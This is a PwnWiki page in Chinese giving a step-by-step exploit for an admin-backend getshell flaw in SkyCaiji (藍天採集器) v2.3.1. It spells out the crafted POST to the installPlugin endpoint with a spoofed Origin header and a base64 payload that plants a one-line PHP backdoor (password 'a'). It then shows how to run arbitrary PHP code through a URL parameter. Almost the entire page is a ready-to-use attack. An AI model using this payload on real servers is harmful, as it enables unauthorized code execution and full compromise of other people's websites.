藍天採集器 v2.3.1 後台getshell漏洞

From PwnWiki
Revision as of 09:41, 17 May 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 訪問 <pre> http://www.0-sec.org/index.php?s=/Admin/Store/installPlugin </pre> 添加http頭Origin: <pre> http://www.0-sec.org </pre> POST: <pre> plugin=ey...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

漏洞利用

訪問 

http://www.0-sec.org/index.php?s=/Admin/Store/installPlugin

添加http頭Origin: 

http://www.0-sec.org

POST: 

plugin=eyJhcHAiOiJBYUFhQWEiLCJuYW1lIjoidGVzdDEiLCJ0eXBlIjoicmVsZWFzZSIsIm1vZHVsZSI6InRlc3QyIiwiY29kZSI6IlBEOXdhSEFLTHlvS2JtRnRaWE53WVdObElIQnNkV2RwYmx4eVpXeGxZWE5sWEdOdGN6c0tDbU5zWVhOeklFRmhRV0ZCWVhzS0NYQjFZbXhwWXlBa2NtVnNaV0Z6WlRzS2ZTb3ZDa0JsZG1Gc0tDUmZSMFZVVzJGZEtUc0tQejQ9In0=

接着会在\plugin\release\cms\下生成AaAaAa.php的一句话后门,密碼爲a

然後在後台點擊發布插件選項卡,再點擊開發按鈕

這時會引用我們帶有一句話木馬的文件,在url上添加a參數即可執行任意php代碼,進而getshell,以執行phpinfo為例,訪問 

http://www.0-sec.org/index.php?s=/admin/Develop/releaseCms&app=AaAaAa&a=phpinfo();
Retrieved from "https://pwnwiki.com/index.php?title=藍天採集器_v2.3.1_後台getshell漏洞&oldid=2879"